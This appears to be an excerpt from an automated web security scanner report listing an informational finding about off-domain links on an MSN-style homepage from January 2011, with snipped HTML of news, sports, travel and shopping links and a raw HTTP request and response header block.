<a href="http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/6D/94835E23C59DA9988832DB01F.jpg" title="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" width="303" height="117" alt="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5"><img class="landscape" src="http://col.stb.s-msn.com/i/A4/C9F6DB1429C482320999B20976453.jpg" title=" Image: Man shredding paper (.. James Darell/Getty Images) " width="128" height="73" alt=" Image: Man shredding paper (.. James Darell/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&amp;form=msnhed&amp;GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/25/0E3EF1611A1E83275679938D78B0.jpg" title="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" width="128" height="73" alt="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&amp;form=msnhed&amp;GT1=36010"><strong>
...[SNIP]...
<p>Bing: Mixing it up <a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&amp;form=msnhed&amp;GT1=36010">on your own is easy</a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&amp;gt1=32067"><img class="portrait" src="http://col.stb.s-msn.com/i/B7/CA0287F24D531F31B28EDED6FF651.jpg" title="Image: Accent pillows (.. redcover.com/Getty Images)" width="116" height="175" alt="Image: Accent pillows (.. redcover.com/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&amp;gt1=32002"><img class="landscape" src="http://col.stb.s-msn.com/i/79/3D0CF24EE45332AEC818733145573.jpg" title="Image: Woman with curly hair style (Courtesy of Essence) " width="128" height="73" alt="Image: Woman with curly hair style (Courtesy of Essence)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/collegebasketball/scores"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/01/29/012911-CBK-Louisville-TWICE-AS-NICE-JW-PI_20110129151135131_303_117.JPG" width="303" height="117" alt="Image: Louisville Cardinals (Fred Beckham/AP)" /></a></div><div><a href="http://msn.foxsports.com/collegebasketball/scores">Live: Upsets abound in college hoops</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/leaderboard">How is Tiger Woods doing in 2011 season debut?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911">NBA star blames gas station stop for positive test</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911">Yankees boss to rival: Keep your team 'off welfare'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911">Report: Olympic swimming star making comeback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911">Suspensions handed down after NBA brawl</a><span class="piped"> | <a href="http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911">Pics</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911">Shaq in green adds twist to Lakers-Celtics rematch</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/a.z?s=73&amp;p=9&amp;c=4&amp;pid=88&amp;yr=2011">Where are top college football prospects headed?</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/80/2FF81810DDCE8AD3FEECAFC567B1FA.jpg" title="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" width="303" height="117" alt="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">'Hey, guess what! It's snowing!' </a>
...[SNIP]...
<p>A New Hampshire news crew hits the snowy streets to make sure the locals <a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">aren't fooled</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;GT1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/1F/B5E89286961128824C7AE6885EC.jpg" title="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" width="128" height="73" alt="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;GT1=42007"><strong>
...[SNIP]...
<p>Go <a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;GT1=42007">behind the scenes</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/6A/5F94C974FCBAE14AFF1F886AE8B.jpg" title="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" width="128" height="73" alt="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007"><strong>
...[SNIP]...
<p>There's a <a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007">treat in store</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001"><img class="portrait" src="http://col.stb.s-msn.com/i/B5/F9DAF1B9A4431DBA728B9CFFBAAF3.jpg" title="Image: DiGiorno's pizza &amp; cookies combo (Courtesy of Delish)" width="116" height="175" alt="Image: DiGiorno's pizza &amp; cookies combo (Courtesy of Delish)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">Pizza &amp; cookie dough: Gross or good?</a>
...[SNIP]...
<p>DiGiorno debuts what is either the <a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">tastiest or most tasteless</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/8B/97F3ADB0E857BC24D9E8B13F3984.jpg" title="Image: Boy on fence (.. Charlie Roy/Getty Images)" width="128" height="73" alt="Image: Boy on fence (.. Charlie Roy/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=first+Beatles+degree&amp;form=msnhed&amp;GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/56/AE3B1E3A7AE6E076D8253197D1489B.jpg" title="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" width="128" height="73" alt="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=first+Beatles+degree&amp;form=msnhed&amp;GT1=36010"><strong>
...[SNIP]...
<p>A UK university has awarded one woman a <a href="http://www.bing.com/search?q=first+Beatles+degree&amp;form=msnhed&amp;GT1=36010">special degree</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&amp;sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&amp;sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&amp;sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&amp;sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&amp;cid=msntab1162226&amp;FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&amp;cid=msntab1174865&amp;FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&amp;cid=msntab1172106&amp;Form=TRVCON">37 steals &amp; deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&amp;form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&amp;qpvt=hawaii+hotels&amp;cid=msn_tab&amp;form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&amp;form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_image_jl0125_1x1&amp;gt1=36010"><img src="http://col.stb.s-msn.com/i/9A/ADE8D0D0F6E1E0938CFDB1EA5D949E.jpg" title="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " width="75" height="128" alt="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_image_jl0125_1x1&amp;gt1=36010">Flirty dresses for Valentine's Day </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=NFL+Jerseys%3a+Brett+Favre&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet2_jl0125_1x1&amp;gt1=36010">Popular NFL players' jerseys </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Cupcake+Stand&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet3_jl0125_1x1&amp;gt1=36010">Bake cute, tasty cupcakes at home </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Weight+Loss%3a+Glaxo+Smith+Kline+Alli&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet4_jl0125_1x1&amp;gt1=36010">Diets that take weight off </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/shopping/content/search?q=Hair+Loss+Remedy%3a+Spectral+DNC+Topical+Hair+Loss+Treatment&amp;form=MSHINA&amp;publ=MSNHPSPOT&amp;crea=TEXT_MSHINA_CORE_Bullet5_jl0125_1x1&amp;gt1=36010">Which hair loss remedies really work? </a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.430. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.redacted/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:06:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 44485
Content-Length: 44485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNHPT">Sunday, January 30, 2011</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002"><img src="http://col.stb.s-msn.com/i/3E/3E32A65A54765E9193E7946B7F64.jpg" title="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" width="303" height="211" alt="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">The 10 Best Plays in Super Bowl History </a>
...[SNIP]...
<p>Remember Marcus Allen's touchdown run or Lynn Swann's catch? Check out the big game's <a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">best plays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl coverage </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy/football/big-game-challenge">Take the Big Game Challenge &amp; beat the experts </a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&amp;GT1=39002">Pro Bowl stars collide today in Honolulu </a>
...[SNIP]...
<a href="http://glo.redacted/beauty/color-combo-6391.gallery?gt1=49036"><img src="http://col.stb.s-msn.com/i/DF/749E3611476657BDEDA1876151B3D.jpg" title="Image: (From left) Demi Moore &amp; Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" width="303" height="211" alt="Image: (From left) Demi Moore &amp; Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" /></a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/compare-income-debt-savings.aspx?GT1=33021"><img src="http://col.stb.s-msn.com/i/51/E28E2C88338D867AE51A2853768E.jpg" title="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" width="303" height="211" alt="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/article.aspx?cp-documentid=26648468&amp;GT1=35009"><img src="http://col.stb.s-msn.com/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg" title=" Image: Women playing pool &amp; darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " width="303" height="211" alt=" Image: Women playing pool &amp; darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mom+cave+essentials&amp;form=msnhed&amp;GT1=36010">Bing: Essentials for your mom cave </a>
...[SNIP]...
<span><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Videos: Animals on the Attack </a>
...[SNIP]...
<li style="width:206px;" class="first"><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006"><img src="http://col.stb.s-msn.com/i/8D/E0998F7A3F51B4EE9CA9E669DD865.jpg" title=" Image: Video still of warring warthogs (.. Animal Planet) " width="206" height="144" alt=" Image: Video still of warring warthogs (.. Animal Planet) " /></a><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Warring warthogs fond of fighting </a>
...[SNIP]...
<li style="width:206px;"><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006"><img src="http://col.stb.s-msn.com/i/66/C6BBA80994D7B938E61E7E4EFDAA5.jpg" title="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" width="206" height="144" alt="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Baby rhino races to mom's rescue </a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006"><img src="http://col.stb.s-msn.com/i/48/12578C8D1EA6531FBD7D7466FA79C.jpg" title="Image: Video still of fighting male giraffes (.. Animal Planet)" width="206" height="144" alt="Image: Video still of fighting male giraffes (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Angry giraffes caught necking </a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&amp;gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&amp;feedID=3698&amp;gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg" title="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" width="303" height="117" alt="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" /></a></div><div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000">Disney's happiest places on Earth </a>
...[SNIP]...
<p>The vacation giant has global tours, cruises &amp; famous parks. Which of these <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000">13 adventures should you take</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/C029CA31B84EE7CFCB17C349435C.jpg" title="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" width="128" height="73" alt="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000"><strong>
...[SNIP]...
<p>If hotels could talk, what stories they could tell. Check out these <a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000">12 hotels with a past</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&amp;cid=msn1177192&amp;form=TRVCON&amp;gt1=41000">6 great reasons to visit New York this year </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&amp;cid=msn1177190&amp;form=TRVCON&amp;gt1=41000">Tips for traveling with your pet </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon&amp;gt1=41000">Leave winter behind: Find great flight deals </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon&amp;gt1=41000">Find a hotel for your next getaway </a>
...[SNIP]...
<a href="http://glo.redacted/living/superbowl-kids-bash-6426.gallery?gt1=49037"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg" title="Image: Various treats for football party (Courtesy of shindigparties)" width="303" height="117" alt="Image: Various treats for football party (Courtesy of shindigparties)" /></a>
...[SNIP]...
<a href="http://glo.redacted/style/10-winter-style-essentials-6421.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/F8/81185586C353EC6EA7CB7985B625C.jpg" title="Image: Bubble jacket &amp; gloves (Courtesy of Ann Taylor; Kohl's)" width="128" height="73" alt="Image: Bubble jacket &amp; gloves (Courtesy of Ann Taylor; Kohl's)" /></a>
...[SNIP]...
<a href="http://glo.redacted/relationships/caroline-rules-1534096.story?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/EA261A55FB948339E67F47051B4F6.jpg" title="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" width="128" height="73" alt="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" /></a>
...[SNIP]...
